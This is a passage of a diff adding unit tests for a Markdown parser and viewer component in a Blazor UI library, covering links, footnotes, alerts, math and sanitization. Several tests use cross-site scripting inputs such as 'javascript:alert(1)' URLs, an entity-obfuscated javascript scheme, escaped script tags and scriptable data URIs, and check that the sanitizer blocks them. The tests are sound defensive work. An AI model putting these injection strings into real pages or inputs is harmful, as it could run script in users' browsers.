+        // The schemes an image may not have are still refused.
+        foreach (var destination in new[] { "javascript:alert(1)", "mailto:a@b.c", "data:text/html,<x>" })
+        {
+            var blocked = BitMarkdownAstHelper
+                .Descendants(BitMarkdownParser.Parse($"![x][d]\n\n[d]: {destination}"))
+                .OfType<BitMarkdownImageNode>().Single();
+            Assert.AreEqual(string.Empty, blocked.Url, destination);
+        }
+    }
+
+    [TestMethod]
+    public void BitMarkdownPipelineShouldParseAParagraphOfDollarSignsInLinearTime()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseMathematics().Build();
+        pipeline.Parse("warm $up ");
+
+        // Every "$" used to rescan the remainder of the paragraph looking for a closing delimiter
+        // that was never there, which made a page of prices quadratic in its own length.
+        var watch = System.Diagnostics.Stopwatch.StartNew();
+        pipeline.Parse(string.Concat(Enumerable.Repeat("a $b ", 16_000)));
+        long elapsed = watch.ElapsedMilliseconds;
+
+        Assert.IsTrue(elapsed < 500, $"80KB of spaced dollar signs took {elapsed}ms");
+
+        // A closing delimiter that is there is still found, including past one that was rejected.
+        Assert.AreEqual("x+1", BitMarkdownAstHelper.Descendants(pipeline.Parse("a $x+1$ b"))
+            .OfType<BitMarkdownMathNode>().Single().Content);
+        Assert.AreEqual("a $b", BitMarkdownAstHelper.Descendants(pipeline.Parse("$a $b$"))
+            .OfType<BitMarkdownMathNode>().Single().Content);
+    }
+
+    [TestMethod]
+    public void BitMarkdownMathBlockShouldNotBreakAParagraphItDoesNotOpen()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseMathematics().Build();
+
+        // "$$5 for two" is prose, so the line above it stays part of the same paragraph.
+        Assert.AreEqual(1, pipeline.Parse("The cost is\n$$5 for two\n").Children.Count);
+
+        // A block that does open still interrupts the paragraph above it.
+        var document = pipeline.Parse("text\n$$\nx=1\n$$\n");
+        Assert.AreEqual(2, document.Children.Count);
+        Assert.IsInstanceOfType<BitMarkdownMathNode>(document.Children[1]);
+        // And so does a complete one-line block.
+        Assert.AreEqual(2, pipeline.Parse("text\n$$ x=1 $$\n").Children.Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownSmartyPantsShouldLeaveAnAutoLinkReadingAsItsDestination()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseAutoLinks().UseSmartyPants().Build();
+
+        var link = BitMarkdownAstHelper.Descendants(pipeline.Parse("see https://a.com/x--y...z"))
+            .OfType<BitMarkdownLinkNode>().Single();
+
+        // The text of an autolink is its destination: educating one and not the other would leave
+        // the reader copying a URL the link does not go to.
+        Assert.AreEqual(link.Url, BitMarkdownInlineHelpers.PlainText(link.Children));
+
+        // A label the author wrote is still educated.
+        var written = BitMarkdownAstHelper
+            .Descendants(new BitMarkdownPipelineBuilder().UseSmartyPants().Build().Parse("[a--b](/x)"))
+            .OfType<BitMarkdownLinkNode>().Single();
+        Assert.AreEqual("a–b", BitMarkdownInlineHelpers.PlainText(written.Children));
+    }
+
+    [TestMethod]
+    public void BitMarkdownBaseUrlShouldLeaveARootRelativeDestinationAlone()
+    {
+        var relative = new BitMarkdownPipelineBuilder().UseBaseUrl("/docs/").Build();
+        var absolute = new BitMarkdownPipelineBuilder().UseBaseUrl("https://b.com/r/").Build();
+
+        // A root-relative destination is already resolved against the site root, which is what the
+        // absolute base does with one too; prefixing it as well pointed at nothing.
+        Assert.AreEqual("/img/logo.png", Destination(relative, "[a](/img/logo.png)"));
+        Assert.AreEqual("https://b.com/img/logo.png", Destination(absolute, "[a](/img/logo.png)"));
+
+        // A genuinely relative one is still resolved against the base.
+        Assert.AreEqual("/docs/img/logo.png", Destination(relative, "[a](img/logo.png)"));
+        Assert.AreEqual("/docs/img/logo.png", Destination(relative, "[a](./img/logo.png)"));
+        Assert.AreEqual("https://b.com/r/img/logo.png", Destination(absolute, "[a](img/logo.png)"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownPipelineShouldReportAFlavorConfiguredTwiceInsteadOfDroppingOne()
+    {
+        // Silently keeping the first registration meant the options in the later call simply did
+        // not apply, with nothing said about it.
+        Assert.ThrowsExactly<InvalidOperationException>(() =>
+            new BitMarkdownPipelineBuilder().UseAutoIdentifiers().UseAutoIdentifiers(anchorLinks: true).Build());
+        Assert.ThrowsExactly<InvalidOperationException>(() =>
+            new BitMarkdownPipelineBuilder().UseAdvanced()
+                .UseEmojis(new Dictionary<string, string> { ["x"] = "y" }).Build());
+
+        // Adding the same flavor with the same configuration asks for nothing new, and is a no-op.
+        new BitMarkdownPipelineBuilder().UseGitHubFlavored().UsePipeTables().Build();
+        new BitMarkdownPipelineBuilder().UseAutoIdentifiers().UseAutoIdentifiers().Build();
+        new BitMarkdownPipelineBuilder().UseLinkOptions().UseLinkOptions().Build();
+    }
+
+    [TestMethod]
+    public void BitMarkdownAdvancedShouldDeferToAFlavorAlreadyConfigured()
+    {
+        // The bundle asks for the flavor, not for particular options, so configuring one before it
+        // keeps that configuration.
+        var configured = new BitMarkdownPipelineBuilder().UseAutoIdentifiers(anchorLinks: true).UseAdvanced().Build();
+        Assert.IsTrue(BitMarkdownAstHelper.Descendants(configured.Parse("# A"))
+            .OfType<BitMarkdownHeadingAnchorNode>().Any());
+
+        // With nothing configured, the bundle's own default still applies.
+        var plain = new BitMarkdownPipelineBuilder().UseAdvanced().Build();
+        Assert.IsFalse(BitMarkdownAstHelper.Descendants(plain.Parse("# A"))
+            .OfType<BitMarkdownHeadingAnchorNode>().Any());
+        Assert.AreEqual("a", BitMarkdownAstHelper.Descendants(plain.Parse("# A"))
+            .OfType<BitMarkdownHeadingNode>().Single().Id);
+    }
+
+    [TestMethod]
+    public void BitMarkdownUrlRewritesShouldComposeInTheOrderTheyWereAdded()
+    {
+        // A base URL and a rewriter of one's own is the pair this is most often written as, and one
+        // of them being the only one that applied was not something the caller was told about.
+        var pipeline = new BitMarkdownPipelineBuilder()
+            .UseBaseUrl("https://b.com/r/")
+            .UseUrlRewriter(context => context.Url.Replace("https://b.com/", "https://cdn.z.com/"))
+            .Build();
+
+        Assert.AreEqual("https://cdn.z.com/r/x.png", Destination(pipeline, "[a](x.png)"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownFootnoteDefinitionShouldInterruptTheParagraphAboveIt()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseFootnotes().Build();
+
+        // Absorbed into the paragraph, the definition printed as prose and the citation - with its
+        // label now undefined - degraded to literal text.
+        var document = pipeline.Parse("a[^1]\n[^1]: note");
+
+        Assert.IsTrue(BitMarkdownAstHelper.Descendants(document).OfType<BitMarkdownFootnoteReferenceNode>().Any());
+        Assert.IsTrue(document.Children.OfType<BitMarkdownFootnotesNode>().Any());
+        StringAssert.DoesNotMatch(BitMarkdownAstHelper.ToPlainText(document),
+            new System.Text.RegularExpressions.Regex(@"\[\^1\]:"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownFootnoteReferenceShouldSurviveAColonAfterIt()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseFootnotes().Build();
+
+        // "[^1]:" is the definition only at the start of a line. Read as one mid-sentence, the
+        // citation stayed literal text and the note it pointed at was dropped as uncited.
+        var document = pipeline.Parse("note[^1]: colon\n\n[^1]: def");
+
+        Assert.IsTrue(BitMarkdownAstHelper.Descendants(document).OfType<BitMarkdownFootnoteReferenceNode>().Any());
+        StringAssert.Contains(BitMarkdownAstHelper.ToPlainText(document), "def");
+    }
+
+    [TestMethod]
+    public void BitMarkdownAbbreviationDefinitionShouldInterruptTheParagraphAboveIt()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseAbbreviations().Build();
+
+        // The line right after a sentence is the natural place to explain a term just used.
+        var document = pipeline.Parse("Uses HTML here\n*[HTML]: HyperText");
+
+        Assert.AreEqual(1, BitMarkdownAstHelper.Descendants(document).OfType<BitMarkdownAbbreviationNode>().Count());
+        StringAssert.DoesNotMatch(BitMarkdownAstHelper.ToPlainText(document),
+            new System.Text.RegularExpressions.Regex(@"\*\[HTML\]"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownContainerShouldOnlyBeOpenedByAFenceCarryingAName()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseContainers().Build();
+
+        // An info-less ":::" is a closer. Read as an opening fence, a stray one claimed every line
+        // that followed it - the rest of a block quote, or the rest of the document.
+        var stray = pipeline.Parse("text\n:::\nmore");
+        Assert.IsFalse(BitMarkdownAstHelper.Descendants(stray).OfType<BitMarkdownContainerNode>().Any());
+        StringAssert.Contains(BitMarkdownAstHelper.ToPlainText(stray), "more");
+
+        // A named fence still opens one, and still closes on an info-less fence.
+        var container = pipeline.Parse(":::note Heads up\nbody\n:::\nafter")
+            .Children.OfType<BitMarkdownContainerNode>().Single();
+        Assert.AreEqual("note", container.Name);
+        Assert.AreEqual("Heads up", container.Title);
+        StringAssert.Contains(BitMarkdownAstHelper.ToPlainText(container), "body");
+    }
+
+    [TestMethod]
+    public void BitMarkdownContainerShouldNotBeClosedByAFenceInsideACodeBlock()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseContainers().Build();
+
+        // A ":::" written inside a code block is sample text, not this container's closer.
+        var document = pipeline.Parse(":::note\n```\n:::\n```\n:::");
+
+        Assert.AreEqual(1, document.Children.Count);
+        var container = document.Children.OfType<BitMarkdownContainerNode>().Single();
+        Assert.AreEqual(":::", container.Children.OfType<BitMarkdownCodeBlockNode>().Single().Content);
+    }
+
+    [TestMethod]
+    public void BitMarkdownAutoIdentifiersShouldNotLetAnExplicitIdCollide()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseAutoIdentifiers().Build();
+
+        // Two headings carrying one id is invalid markup, and every link to it - the permalinks
+        // this flavor adds included - landed on whichever the browser found first.
+        var collided = BitMarkdownAstHelper.Descendants(pipeline.Parse("# A\n\n# B {#a}"))
+            .OfType<BitMarkdownHeadingNode>().Select(h => h.Id).ToList();
+        CollectionAssert.AllItemsAreUnique(collided);
+        Assert.AreEqual("a", collided[0]);
+
+        // An id nothing else took is kept exactly, which is the whole point of naming one.
+        var named = BitMarkdownAstHelper.Descendants(pipeline.Parse("# A\n\n# B {#stable}"))
+            .OfType<BitMarkdownHeadingNode>().Select(h => h.Id).ToList();
+        CollectionAssert.AreEqual(new[] { "a", "stable" }, named);
+    }
+
+    private static void AssertBoxesAndCountAgree(string markdown)
+    {
+        int drawn = BitMarkdownAstHelper.Descendants(BitMarkdownPipelines.Advanced.Parse(markdown))
+            .OfType<BitMarkdownTaskCheckboxNode>().Count();
+
+        Assert.AreEqual(drawn, BitMarkdownTaskList.Count(markdown), markdown);
+    }
+
+    private static string Destination(BitMarkdownPipeline pipeline, string markdown)
+        => BitMarkdownAstHelper.Descendants(pipeline.Parse(markdown))
+            .OfType<BitMarkdownLinkNode>().Single().Url;
+
     private static string Describe(BitMarkdownDocumentNode document)
         => string.Join("|", BitMarkdownAstHelper.Descendants(document).Select(n => n switch
         {

--- a/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownViewerTests.cs
+++ b/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownViewerTests.cs
@@ -481,4 +481,821 @@ public class BitMarkdownViewerTests : BunitTestContext
         Assert.Contains("<h1>h</h1>", markup);
         Assert.DoesNotContain("hello", markup);
     }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotSplitSurrogatePairsWhenTruncating()
+    {
+        // "# " + a rocket, whose emoji occupies two chars. Cutting at 3 would leave a lone
+        // high surrogate, which renders as a replacement character.
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "# \U0001F680 boom");
+            parameters.Add(p => p.MaxLength, 3);
+        });
+
+        Assert.DoesNotContain("�", component.Markup);
+    }
+
+    // -- Link reference definitions and reference links ----------------------
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldResolveFullReferenceLinks()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "See [the docs][docs].\n\n[docs]: https://bitplatform.dev \"bit\"");
+        });
+
+        var link = component.Find(".bit-mdv a");
+
+        Assert.AreEqual("https://bitplatform.dev", link.GetAttribute("href"));
+        Assert.AreEqual("bit", link.GetAttribute("title"));
+        Assert.AreEqual("the docs", link.TextContent);
+        // The definition itself is not part of the rendered document.
+        Assert.DoesNotContain("[docs]:", component.Markup);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldResolveCollapsedAndShortcutReferences()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[bit][] and [bit].\n\n[bit]: https://bitplatform.dev");
+        });
+
+        var links = component.FindAll(".bit-mdv a");
+
+        Assert.AreEqual(2, links.Count);
+        Assert.AreEqual("https://bitplatform.dev", links[0].GetAttribute("href"));
+        Assert.AreEqual("https://bitplatform.dev", links[1].GetAttribute("href"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldResolveReferencesDefinedBeforeUse()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[bit]: https://bitplatform.dev\n\nGo to [bit].");
+        });
+
+        Assert.AreEqual("https://bitplatform.dev", component.Find(".bit-mdv a").GetAttribute("href"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldMatchReferenceLabelsCaseAndWhitespaceInsensitively()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[Hello   World]\n\n[hello world]: /x");
+        });
+
+        Assert.AreEqual("/x", component.Find(".bit-mdv a").GetAttribute("href"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldResolveReferenceImages()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![a cat][cat]\n\n[cat]: /cat.png");
+        });
+
+        var img = component.Find(".bit-mdv img");
+
+        Assert.AreEqual("/cat.png", img.GetAttribute("src"));
+        Assert.AreEqual("a cat", img.GetAttribute("alt"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldSanitizeReferenceDefinitionUrls()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[click][evil]\n\n[evil]: javascript:alert(1)");
+        });
+
+        var link = component.Find(".bit-mdv a");
+
+        Assert.IsFalse(link.HasAttribute("href"));
+        Assert.DoesNotContain("javascript:", component.Markup);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldLeaveUnresolvedReferencesAsText()
+    {
+        // The document defines "b", so the pre-scan is active, yet "[a]" has no definition
+        // and must read exactly as it was written.
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[a] then [b]\n\n[b]: /b");
+        });
+
+        var markup = component.Markup;
+
+        Assert.Contains("[a] then", markup);
+        Assert.AreEqual(1, component.FindAll(".bit-mdv a").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotTreatBracketedTextAsReferenceWithoutDefinitions()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "see [1] and [note] here");
+        });
+
+        var markup = component.Markup;
+
+        Assert.Contains("[1] and [note] here", markup);
+        Assert.AreEqual(0, component.FindAll(".bit-mdv a").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldKeepTaskListsWorkingAlongsideReferenceDefinitions()
+    {
+        // The definition switches the reference machinery on; the "[ ]" and "[x]" markers
+        // must still reach the task-list processor as one text run.
+        var markdown = "- [x] done\n- [ ] todo\n\n[ref]: /r";
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, markdown);
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+        });
+
+        Assert.AreEqual(2, component.FindAll(".bit-mdv input[type=checkbox]").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotReadIndentedDefinitionsAsDefinitions()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "    [a]: /a");
+        });
+
+        // Four spaces make it an indented code block, not a definition.
+        Assert.Contains("<pre>", component.Markup);
+        Assert.Contains("[a]: /a", component.Markup);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldReadTitleOnTheLineAfterTheDestination()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[a]\n\n[a]: /url\n   \"the title\"");
+        });
+
+        var link = component.Find(".bit-mdv a");
+
+        Assert.AreEqual("/url", link.GetAttribute("href"));
+        Assert.AreEqual("the title", link.GetAttribute("title"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldUseTheFirstOfSeveralDefinitionsOfALabel()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[a]\n\n[a]: /first\n\n[a]: /second");
+        });
+
+        Assert.AreEqual("/first", component.Find(".bit-mdv a").GetAttribute("href"));
+    }
+
+    // -- Entity and numeric character references -----------------------------
+
+    [TestMethod]
+    [DataRow("&copy;", "©")]
+    [DataRow("&#169;", "©")]
+    [DataRow("&#xA9;", "©")]
+    [DataRow("&hellip;", "…")]
+    [DataRow("&mdash;", "—")]
+    public void BitMarkdownViewerShouldDecodeCharacterReferences(string markdown, string expected)
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, markdown);
+        });
+
+        Assert.AreEqual(expected, component.Find(".bit-mdv p").TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldEscapeTextDecodedFromCharacterReferences()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "&lt;script&gt;alert(1)&lt;/script&gt;");
+        });
+
+        // The decoded characters are text, so they are escaped again on the way to the DOM
+        // and can never become live markup.
+        Assert.DoesNotContain("<script>", component.Markup);
+        Assert.AreEqual("<script>alert(1)</script>", component.Find(".bit-mdv p").TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldLeaveUnknownAndMalformedReferencesAlone()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "&nosuchentity; &#; AT&T");
+        });
+
+        Assert.AreEqual("&nosuchentity; &#; AT&T", component.Find(".bit-mdv p").TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotDecodeCharacterReferencesInsideCode()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "`&copy;`\n\n```\n&copy;\n```");
+        });
+
+        Assert.AreEqual("&copy;", component.Find(".bit-mdv code").TextContent);
+        Assert.AreEqual("&copy;", component.Find(".bit-mdv pre code").TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldReplaceOutOfRangeNumericReferences()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "&#0; &#xD800;");
+        });
+
+        Assert.AreEqual("� �", component.Find(".bit-mdv p").TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldSanitizeUrlsAfterDecodingCharacterReferences()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[x](&#x6A;avascript:alert(1))");
+        });
+
+        Assert.IsFalse(component.Find(".bit-mdv a").HasAttribute("href"));
+    }
+
+    // -- Footnotes -----------------------------------------------------------
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderFootnotes()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "Text with a note[^1].\n\n[^1]: The note itself.");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Advanced);
+        });
+
+        var markup = component.Markup;
+
+        Assert.Contains("class=\"footnote-ref\"", markup);
+        Assert.Contains("href=\"#fn-1\"", markup);
+        Assert.Contains("id=\"fnref-1\"", markup);
+        Assert.Contains("id=\"fn-1\"", markup);
+        Assert.Contains("The note itself.", markup);
+        Assert.Contains("class=\"footnote-backref\"", markup);
+        // The definition is lifted out of the flow into the footnotes section.
+        Assert.DoesNotContain("[^1]:", markup);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNumberFootnotesByOrderOfReference()
+    {
+        var markdown = "First[^b] then second[^a].\n\n[^a]: A.\n[^b]: B.";
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, markdown);
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Advanced);
+        });
+
+        var items = component.FindAll(".bit-mdv .footnotes li");
+
+        Assert.AreEqual(2, items.Count);
+        Assert.Contains("B.", items[0].TextContent);
+        Assert.Contains("A.", items[1].TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldGiveEachFootnoteCitationItsOwnBackLink()
+    {
+        var markdown = "One[^n] and two[^n].\n\n[^n]: The note.";
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, markdown);
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Advanced);
+        });
+
+        var markup = component.Markup;
+
+        Assert.Contains("id=\"fnref-1\"", markup);
+        Assert.Contains("id=\"fnref-1-2\"", markup);
+        Assert.AreEqual(2, component.FindAll(".bit-mdv .footnote-backref").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldDropFootnoteDefinitionsNobodyCites()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "Just text.\n\n[^unused]: Nothing points here.");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Advanced);
+        });
+
+        var markup = component.Markup;
+
+        Assert.DoesNotContain("class=\"footnotes\"", markup);
+        Assert.DoesNotContain("Nothing points here.", markup);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotRenderFootnotesWithoutTheExtension()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "Text[^1].\n\n[^1]: The note.");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Basic);
+        });
+
+        Assert.DoesNotContain("class=\"footnote-ref\"", component.Markup);
+        Assert.DoesNotContain("class=\"footnotes\"", component.Markup);
+    }
+
+    // -- Alerts --------------------------------------------------------------
+
+    [TestMethod]
+    [DataRow("NOTE", "note", "Note")]
+    [DataRow("TIP", "tip", "Tip")]
+    [DataRow("IMPORTANT", "important", "Important")]
+    [DataRow("WARNING", "warning", "Warning")]
+    [DataRow("CAUTION", "caution", "Caution")]
+    public void BitMarkdownViewerShouldRenderGitHubAlerts(string marker, string cssKind, string title)
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, $"> [!{marker}]\n> Something worth knowing.");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Advanced);
+        });
+
+        var alert = component.Find($".bit-mdv .markdown-alert-{cssKind}");
+
+        Assert.AreEqual(title, component.Find(".bit-mdv .markdown-alert-title").TextContent);
+        Assert.Contains("Something worth knowing.", alert.TextContent);
+        Assert.AreEqual(0, component.FindAll(".bit-mdv blockquote").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldLeaveOrdinaryBlockquotesAlone()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "> just a quote");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Advanced);
+        });
+
+        Assert.AreEqual(1, component.FindAll(".bit-mdv blockquote").Count);
+        Assert.AreEqual(0, component.FindAll(".bit-mdv .markdown-alert").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotTreatAMarkerFollowedByTextAsAnAlert()
+    {
+        // GitHub requires the marker to be alone on the first line.
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "> [!NOTE] inline text");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Advanced);
+        });
+
+        Assert.AreEqual(0, component.FindAll(".bit-mdv .markdown-alert").Count);
+        Assert.AreEqual(1, component.FindAll(".bit-mdv blockquote").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotRenderAlertsWithoutTheExtension()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "> [!NOTE]\n> Something.");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Basic);
+        });
+
+        Assert.AreEqual(0, component.FindAll(".bit-mdv .markdown-alert").Count);
+        Assert.AreEqual(1, component.FindAll(".bit-mdv blockquote").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerGitHubPipelineShouldCarryFootnotesAndAlerts()
+    {
+        // A footnote definition is also a valid link reference definition, so a pipeline
+        // with the rest of the GitHub flavors must carry footnotes too - otherwise the note
+        // silently becomes a link destination.
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "Text[^1].\n\n[^1]: The note.\n\n> [!TIP]\n> Do this.");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+        });
+
+        Assert.Contains("class=\"footnote-ref\"", component.Markup);
+        Assert.AreEqual(1, component.FindAll(".bit-mdv .markdown-alert-tip").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldKeepUnresolvedFootnoteReferencesAsWritten()
+    {
+        // "[^b]" has no definition; "[^a]" does, which is what turns the pre-scan on.
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "One[^a] two[^B].\n\n[^a]: A note.");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Advanced);
+        });
+
+        Assert.Contains("two[^B].", component.Markup);
+        Assert.AreEqual(1, component.FindAll(".bit-mdv .footnote-ref").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNotNestLinksInsideReferenceLinks()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "[[inner]][outer]\n\n[inner]: /i\n[outer]: /o");
+        });
+
+        var links = component.FindAll(".bit-mdv a");
+
+        Assert.AreEqual(1, links.Count);
+        Assert.AreEqual("/o", links[0].GetAttribute("href"));
+        // The inner link is unwrapped; its content survives as the outer link's text.
+        Assert.AreEqual("inner", links[0].TextContent);
+    }
+
+    // -- Soft line breaks ----------------------------------------------------
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderSoftBreaksAsHardBreaksWhenEnabled()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseSoftLineAsHardLine().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "line one\nline two");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        Assert.AreEqual(1, component.FindAll(".bit-mdv br").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldKeepSoftBreaksSoftByDefault()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "line one\nline two");
+        });
+
+        Assert.AreEqual(0, component.FindAll(".bit-mdv br").Count);
+    }
+
+    // -- Rendering details ---------------------------------------------------
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldAlignTableColumnsWithClassesNotInlineStyles()
+    {
+        var markdown = "| l | c | r |\n|:--|:-:|--:|\n| 1 | 2 | 3 |";
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, markdown);
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+        });
+
+        var headers = component.FindAll(".bit-mdv th");
+
+        Assert.AreEqual("bit-mdv-align-left", headers[0].GetAttribute("class"));
+        Assert.AreEqual("bit-mdv-align-center", headers[1].GetAttribute("class"));
+        Assert.AreEqual("bit-mdv-align-right", headers[2].GetAttribute("class"));
+        // Inline styles are unusable under a strict Content-Security-Policy.
+        Assert.DoesNotContain("text-align:", component.Markup);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldLazyLoadImages()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "![a](/a.png)");
+        });
+
+        var img = component.Find(".bit-mdv img");
+
+        Assert.AreEqual("lazy", img.GetAttribute("loading"));
+        Assert.AreEqual("async", img.GetAttribute("decoding"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldAllowEmbeddedRasterImages()
+    {
+        const string data = "data:image/png;base64,iVBORw0KGgo=";
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, $"![dot]({data})");
+        });
+
+        Assert.AreEqual(data, component.Find(".bit-mdv img").GetAttribute("src"));
+    }
+
+    [TestMethod]
+    [DataRow("data:image/svg+xml,%3Csvg%3E")]
+    [DataRow("data:text/html,%3Cscript%3E")]
+    [DataRow("data:image/pngx,AAAA")]
+    public void BitMarkdownViewerShouldBlockScriptableDataImages(string url)
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, $"![x]({url})");
+        });
+
